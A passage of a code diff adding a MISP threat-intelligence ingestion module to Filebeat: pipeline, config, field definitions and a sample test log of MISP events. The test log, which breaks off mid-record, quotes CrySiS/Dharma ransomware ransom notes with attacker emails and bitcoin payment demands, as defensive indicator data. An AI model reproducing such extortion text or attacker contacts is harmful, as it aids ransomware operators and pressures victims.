"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" +} diff --git a/x-pack/filebeat/module/threatintel/misp/_meta/fields.yml b/x-pack/filebeat/module/threatintel/misp/_meta/fields.yml new file mode 100644 index 000000000000..c352ecce303b --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/_meta/fields.yml @@ -0,0 +1,165 @@ +- name: misp + type: group + description: > + Fields for MISP Threat Intel + fields: + - name: id + type: keyword + description: > + Attribute ID. + - name: orgc_id + type: keyword + description: > + Organization Community ID of the event. + - name: org_id + type: keyword + description: > + Organization ID of the event. + - name: threat_level_id + type: long + description: > + Threat level from 5 to 1, where 1 is the most critical. + - name: info + type: keyword + description: > + Additional text or information related to the event. + - name: published + type: boolean + description: > + When the event was published. + - name: uuid + type: keyword + description: > + The UUID of the event object. + - name: date + type: date + description: > + The date of when the event object was created. + - name: attribute_count + type: long + description: > + How many attributes are included in a single event object. + - name: timestamp + type: date + description: > + The timestamp of when the event object was created. + - name: distribution + type: keyword + description: > + Distribution type related to MISP. + - name: proposal_email_lock + type: boolean + description: > + Settings configured on MISP for email lock on this event object. + - name: locked + type: boolean + description: > + If the current MISP event object is locked or not. + - name: publish_timestamp + type: date + description: > + At what time the event object was published + - name: sharing_group_id + type: keyword + description: > + The ID of the grouped events or sources of the event. + - name: disable_correlation + type: boolean + description: > + If correlation is disabled on the MISP event object. + - name: extends_uuid + type: keyword + description: > + The UUID of the event object it might extend. + - name: org.id + type: keyword + description: > + The organization ID related to the event object. + - name: org.name + type: keyword + description: > + The organization name related to the event object. + - name: org.uuid + type: keyword + description: > + The UUID of the organization related to the event object. + - name: org.local + type: boolean + description: > + If the event object is local or from a remote source. + - name: orgc.id + type: keyword + description: > + The Organization Community ID in which the event object was reported from. + - name: orgc.name + type: keyword + description: > + The Organization Community name in which the event object was reported from. + - name: orgc.uuid + type: keyword + description: > + The Organization Community UUID in which the event object was reported from. + - name: orgc.local + type: boolean + description: > + If the Organization Community was local or synced from a remote source. + - name: attribute.id + type: keyword + description: > + The ID of the attribute related to the event object. + - name: attribute.type + type: keyword + description: > + The type of the attribute related to the event object. For example email, ipv4, sha1 and such. + - name: attribute.category + type: keyword + description: > + The category of the attribute related to the event object. For example "Network Activity". + - name: attribute.to_ids + type: boolean + description: > + If the attribute should be automatically synced with an IDS. + - name: attribute.uuid + type: keyword + description: > + The UUID of the attribute related to the event. + - name: attribute.event_id + type: keyword + description: > + The local event ID of the attribute related to the event. + - name: attribute.distribution + type: long + description: > + How the attribute has been distributed, represented by integer numbers. + - name: attribute.timestamp + type: date + description: > + The timestamp in which the attribute was attached to the event object. + - name: attribute.comment + type: keyword + description: > + Comments made to the attribute itself. + - name: attribute.sharing_group_id + type: keyword + description: > + The group ID of the sharing group related to the specific attribute. + - name: attribute.deleted + type: boolean + description: > + If the attribute has been removed from the event object. + - name: attribute.disable_correlation + type: boolean + description: > + If correlation has been enabled on the attribute related to the event object. + - name: attribute.object_id + type: keyword + description: > + The ID of the Object in which the attribute is attached. + - name: attribute.object_relation + type: keyword + description: > + The type of relation the attribute has with the event object itself. + - name: attribute.value + type: keyword + description: > + The value of the attribute, depending on the type like "url, sha1, email-src". diff --git a/x-pack/filebeat/module/threatintel/misp/config/config.yml b/x-pack/filebeat/module/threatintel/misp/config/config.yml new file mode 100644 index 000000000000..c0700f6b4250 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/config/config.yml @@ -0,0 +1,74 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +request.method: POST +{{ if .ssl }} + - request.ssl: {{ .ssl | tojson }} +{{ end }} +request.url: {{ .url }} +request.body: + limit: 100 + page: 1 + returnFormat: json +{{if .filters}} + {{ range $key, $value := .filters}}{{$key}}: {{$value | tojson}}{{end}} +{{end}} +request.transforms: +{{ if .api_token }} +- set: + target: header.Authorization + value: {{ .api_token }} +{{end}} +- set: + target: body.timestamp + value: '[[.cursor.timestamp]]' + default: '[[ formatDate (now (parseDuration "-{{ .first_interval }}")) "UnixDate" ]]' + +response.split: + target: body.response + split: + target: body.Event.Attribute + keep_parent: true +response.request_body_on_pagination: true +response.pagination: +- set: + target: body.page + value: '[[add .last_response.page 1]]' +cursor: + timestamp: + value: '[[.last_event.Event.timestamp]]' + + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + fields: [message] + document_id: Event.Attribute.uuid + target: json + - script: + lang: javascript + id: my_filter + source: > + function process(event) { + event.Put("@metadata.op_type", "index"); + } + - add_fields: + target: '' + fields: + ecs.version: 1.6.0 diff --git a/x-pack/filebeat/module/threatintel/misp/ingest/pipeline.yml b/x-pack/filebeat/module/threatintel/misp/ingest/pipeline.yml new file mode 100644 index 000000000000..e62a6e407d7d --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/ingest/pipeline.yml @@ -0,0 +1,293 @@ +description: Pipeline for parsing MISP Threat Intel +processors: + +#################### +# Event ECS fields # +#################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: enrichment +- set: + field: event.category + value: threat +- set: + field: event.type + value: indicator + +###################### +# General ECS fields # +###################### +- rename: + field: json.Event + target_field: threatintel.misp + ignore_missing: true +- set: + field: threatintel.indicator.provider + value: misp + if: ctx?.threatintel?.misp?.Orgc?.local != 'false' +- set: + field: threatintel.indicator.provider + value: '{{misp.Orgc.name}}' + if: ctx?.threatintel?.misp?.Orgc?.local == 'false' + ignore_empty_value: true + +# Removing fields not needed anymore, either because its copied somewhere else, or is not relevant to this event +- remove: + field: + - threatintel.misp.ShadowAttribute + - message + - threatintel.misp.RelatedEvent + - threatintel.misp.Galaxy + - threatintel.misp.Attribute.Galaxy + - threatintel.misp.Attribute.ShadowAttribute + - threatintel.misp.Object + - threatintel.misp.EventReport + ignore_missing: true +- date: + field: threatintel.misp.Attribute.timestamp + formats: + - UNIX + ignore_failure: true +- rename: + field: threatintel.misp.Attribute + target_field: threatintel.misp.attribute + ignore_missing: true +- rename: + field: threatintel.misp.Orgc + target_field: threatintel.misp.orgc + ignore_missing: true +- rename: + field: threatintel.misp.Org + target_field: threatintel.misp.org + ignore_missing: true +- rename: + field: threatintel.misp.Attribute + target_field: threatintel.misp.attribute + ignore_missing: true +- rename: + field: threatintel.misp.Tag + target_field: threatintel.misp.tag + ignore_missing: true + +##################### +# Threat ECS Fields # +##################### +- rename: + field: threatintel.misp.attribute.first_seen + target_field: threatintel.indicator.first_seen + ignore_missing: true +- rename: + field: threatintel.misp.attribute.last_seen + target_field: threatintel.indicator.last_seen + ignore_missing: true +- convert: + field: threatintel.misp.analysis + type: long + target_field: threatintel.indicator.scanner_stats + ignore_missing: true +- convert: + field: threatintel.misp.threat_level_id + type: long + ignore_missing: true + +## File/Hash indicator operations +- set: + field: threatintel.indicator.type + value: file + if: "['md5', 'impfuzzy', 'imphash', 'pehash', 'sha1', 'sha224', 'sha256', 'sha3-224', 'sha3-256', 'sha3-384', 'sha3-512', 'sha384', 'sha512', 'sha512/224', 'sha512/256', 'ssdeep', 'tlsh', 'vhash'].contains(ctx.threatintel?.misp?.attribute?.type) || ctx.threatintel?.misp?.attribute?.type.startsWith('filename')" +- rename: + field: threatintel.misp.attribute.value + target_field: "threatintel.indicator.file.hash.{{threatintel.misp.attribute.type}}" + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'file' && !ctx?.threatintel?.misp?.attribute?.type.startsWith('filename')" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.file.name + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'file' && ctx?.threatintel?.misp?.attribute?.type != 'filename'" +- grok: + field: threatintel.misp.attribute.type + patterns: + - "%{DATA}\\|%{DATA:_tmp.hashtype}" + ignore_missing: true + if: ctx?.threatintel?.misp?.attribute?.type.startsWith('filename|') +- grok: + field: threatintel.misp.attribute.value + patterns: + - "%{DATA:threatintel.indicator.file.name}\\|%{DATA:_tmp.hashvalue}" + ignore_missing: true + if: ctx?.threatintel?.misp?.attribute?.type.startsWith('filename|') +- set: + field: threatintel.indicator.file.hash.{{_tmp.hashtype}} + value: '{{_tmp.hashvalue}}' + if: "ctx?.threatintel?.misp?.attribute?.type.startsWith('filename|') && ctx?._tmp?.hashvalue != null && ctx?._tmp?.hashtype != null" + +## URL/URI indicator operations +- set: + field: threatintel.indicator.type + value: url + if: "ctx?.threatintel?.indicator?.type == null && ['url', 'link', 'uri'].contains(ctx?.threatintel?.misp?.attribute?.type)" +- uri_parts: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.url + keep_original: true + remove_if_successful: true + if: ctx?.threatintel?.indicator?.type == 'url' && ctx?.threatintel?.misp?.attribute?.type != 'uri' +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.url.full + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'url' && ctx?.threatintel?.indicator?.url?.original == null && ctx?.threatintel?.misp?.attribute?.type != 'uri'" + +## Regkey indicator operations +- set: + field: threatintel.indicator.type + value: windows-registry-key + if: "ctx?.threatintel?.indicator?.type == null && ctx?.threatintel?.misp?.attribute?.type.startsWith('regkey')" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.registry.key + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'windows-registry-key' && ctx?.threatintel?.misp?.attribute?.type == 'regkey'" +- grok: + field: threatintel.misp.attribute.value + patterns: + - "%{DATA:threatintel.indicator.registry.key}\\|%{DATA:threatintel.indicator.registry.value}" + ignore_missing: true + if: "ctx?.threatintel?.misp?.attribute?.type == 'regkey|value'" + +## AS indicator operations +- set: + field: threatintel.indicator.type + value: autonomous-system + if: "ctx?.threatintel?.indicator?.type == null && ctx?.threatintel?.misp?.attribute?.type == 'AS'" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.as + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'autonomous-system' + +## Domain/IP/Port indicator operations +- append: + field: threatintel.indicator.type + value: domain-name + if: "ctx?.threatintel?.indicator?.type == null && ctx?.threatintel?.misp?.attribute?.type.startsWith('domain')" +- append: + field: threatintel.indicator.type + value: ipv4-addr + if: "ctx?.threatintel?.indicator?.type == null && ['domain|ip', 'ip-src', 'ip-src|port', 'ip-dst', 'ip-dst|port'].contains(ctx?.threatintel?.misp?.attribute?.type)" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.domain + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'domain-name' && ctx?.threatintel?.misp?.attribute?.type != 'domain|ip'" +- grok: + field: threatintel.misp.attribute.value + patterns: + - "%{DATA:threatintel.indicator.domain}\\|%{IP:threatintel.indicator.ip}" + ignore_missing: true + if: ctx.threatintel?.misp?.attribute?.type == 'domain|ip' +- grok: + field: threatintel.misp.attribute.value + patterns: + - "%{IP:threatintel.indicator.ip}\\|%{NUMBER:threatintel.indicator.port}" + ignore_missing: true + if: "['ip-src|port', 'ip-dst|port'].contains(ctx.threatintel?.misp?.attribute?.type)" + +## Email indicator operations +# Currently this ignores email-message, except setting the type it will leave the rest of the fields under misp. +- set: + field: threatintel.indicator.type + value: email-addr + if: "ctx?.threatintel?.indicator?.type == null && ['email-dst', 'email-src'].contains(ctx.threatintel?.misp?.attribute?.type)" +- set: + field: threatintel.indicator.type + value: email-message + if: "ctx?.threatintel?.indicator?.type == null && ctx.threatintel?.misp?.attribute?.type.startsWith('email') && !['email-dst', 'email-src'].contains(ctx.threatintel?.misp?.attribute?.type)" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.email.address + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'email-addr' + +## MAC Address indicator operations +- set: + field: threatintel.indicator.type + value: mac-addr + if: "ctx?.threatintel?.indicator?.type == null && ['mac-address', 'mac-eui-64'].contains(ctx.threatintel?.misp?.attribute?.type)" +- rename: + field: threatintel.misp.attribute.value + target_field: threatintel.indicator.mac + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'mac-addr' + +################### +# Tags ECS fields # +################### +# Stripping special characters from tags +- script: + lang: painless + if: ctx?.threatintel?.misp?.tag != null + source: | + def tags = ctx.threatintel.misp.tag.stream() + .map(t -> t.name.replace('\\', '').replace('"', '')) + .collect(Collectors.toList()); + def tlpTags = tags.stream() + .filter(t -> t.startsWith('tlp:')) + .map(t -> t.replace('tlp:', '')) + .collect(Collectors.toList()); + + ctx.tags = tags; + ctx.threatintel.indicator = ['marking' : [ 'tlp': tlpTags ]]; + +# Setting indicator type to unknown if it does not match anything +- set: + field: threatintel.indicator.type + value: unknown + if: ctx?.threatintel?.indicator?.type == null + +###################### +# Cleanup processors # +###################### +- script: + lang: painless + if: ctx?.threatintel != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); +# Removing fields not needed anymore, either because its copied somewhere else, or is not relevant to this event +- remove: + field: + - threatintel.misp.Attribute.timestamp + - threatintel.misp.timestamp + - threatintel.misp.tag + - threatintel.misp.org + - threatintel.misp.analysis + - _tmp + ignore_missing: true + +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/threatintel/misp/manifest.yml b/x-pack/filebeat/module/threatintel/misp/manifest.yml new file mode 100644 index 000000000000..a39c1fe44963 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/manifest.yml @@ -0,0 +1,20 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: interval + default: 60m + - name: first_interval + default: 24h + - name: api_token + - name: ssl + - name: filters + - name: url + default: "https://localhost/events/restSearch" + - name: tags + default: [threatintel-misp, forwarded] + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log b/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log new file mode 100644 index 000000000000..9cbd51a844e8 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log @@ -0,0 +1,15 @@ +{"Event":{"Attribute":{"Galaxy":[],"ShadowAttribute":[],"category":"Payload delivery","comment":"- Xchecked via VT: a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e","deleted":false,"disable_correlation":false,"distribution":"5","event_id":"5","first_seen":null,"id":"351","last_seen":null,"object_id":"0","object_relation":null,"sharing_group_id":"0","timestamp":"1503930272","to_ids":true,"type":"md5","uuid":"59a427a0-f6f8-4178-9e7d-dfd702de0b81","value":"f2679bdabe46e10edc6352fff3c829bc"},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","http://pastebin.com/raw/GHgpWjar","MISP Project"],"collection_uuid":"10cf658b-5d32-4c4b-bb32-61760a640372","description":"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant","galaxy_id":"43","id":"6619","local":false,"meta":{"date":["November 2016"],"encryption":["AES + RSA-512"],"extensions":[".dharma",".wallet",".zzzzz",".cmb",".id-BCBEF350.[paymentbtc@firemail.cc].cmb",".bip",".id-BCBEF350.[Beamsell@qq.com].bip",".boost",".[Darknes@420blaze.it].waifu",".brrr",".adobe",".tron",".AUDIT",".cccmn",".fire",".myjob",".[cyberwars@qq.com].war",".risk",".RISK",".bkpx",".[newsantaclaus@aol.com].santa"],"payment-method":["Bitcoin - Email"],"ransomnotes":["all your data has been locked us\\nYou want to return?\\nwrite email paymentbtc@firemail.cc","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\nWrite this ID in the title of your message ACBFF130\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', 